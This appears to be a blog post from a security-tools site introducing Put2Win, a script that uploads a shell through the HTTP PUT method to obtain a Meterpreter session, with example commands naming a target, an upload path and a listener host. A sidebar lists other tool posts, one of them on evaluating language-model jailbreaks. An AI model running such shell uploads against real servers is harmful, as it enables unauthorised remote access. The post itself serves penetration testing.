Categories: Kali Linux

Put2Win – Script To Automatize Shell Upload By PUT HTTP Method To Get Meterpreter

Put2Win is a script to automatize shell upload by PUT HTTP method to get meterpreter. It’s necessary to have installed nmap and msfvenom tools for a correct operation.

Also ReadJoomscan – OWASP Joomla Vulnerability Scanner Project

Put2Win Usage

./Put2win.sh -h

This script automatize shell upload by PUT HTTP method to get meterpreter.

Usage: ./Put2win.sh -t TARGET [-p PORT] -u URL_PATH -l LHOST

Examples:

./Put2win.sh -t 192.168.1.80 -u /uploads -l 192.168.1.10
./Put2win.sh -t 192.168.1.80 -p 443 -u /uploads -l 192.168.1.10

Credit: @devploit

R K

Recent Posts

100 Days Of Rust 2025 : From Incident Response To Linux System Programming

In 2025 I wanted to try something new. In addition to a traditional 100 days…

2 days ago

Presenterm : Revolutionizing Terminal-Based Presentations With Markdown

presenterm lets you create presentations in markdown format and run them from your terminal, with…

2 days ago

JailbreakEval : Automating the Evaluation Of Language Model Security

Jailbreak is an attack that prompts a language model to give actionable responses to harmful…

2 days ago

HASH : Harnessing HTTP Agnostic Software Honeypots For Enhanced Cybersecurity

The main philosophy of HASH is to be easy to configure and flexible to mimic…

2 days ago

SECurityTr8Ker : SEC Cybersecurity Disclosure Monitor

SECurityTr8Ker is a Python application designed to monitor the U.S. Securities and Exchange Commission's (SEC)…

6 days ago

ripgrep : The Fast, Flexible Search Tool

ripgrep is a line-oriented search tool that recursively searches the current directory for a regex…

6 days ago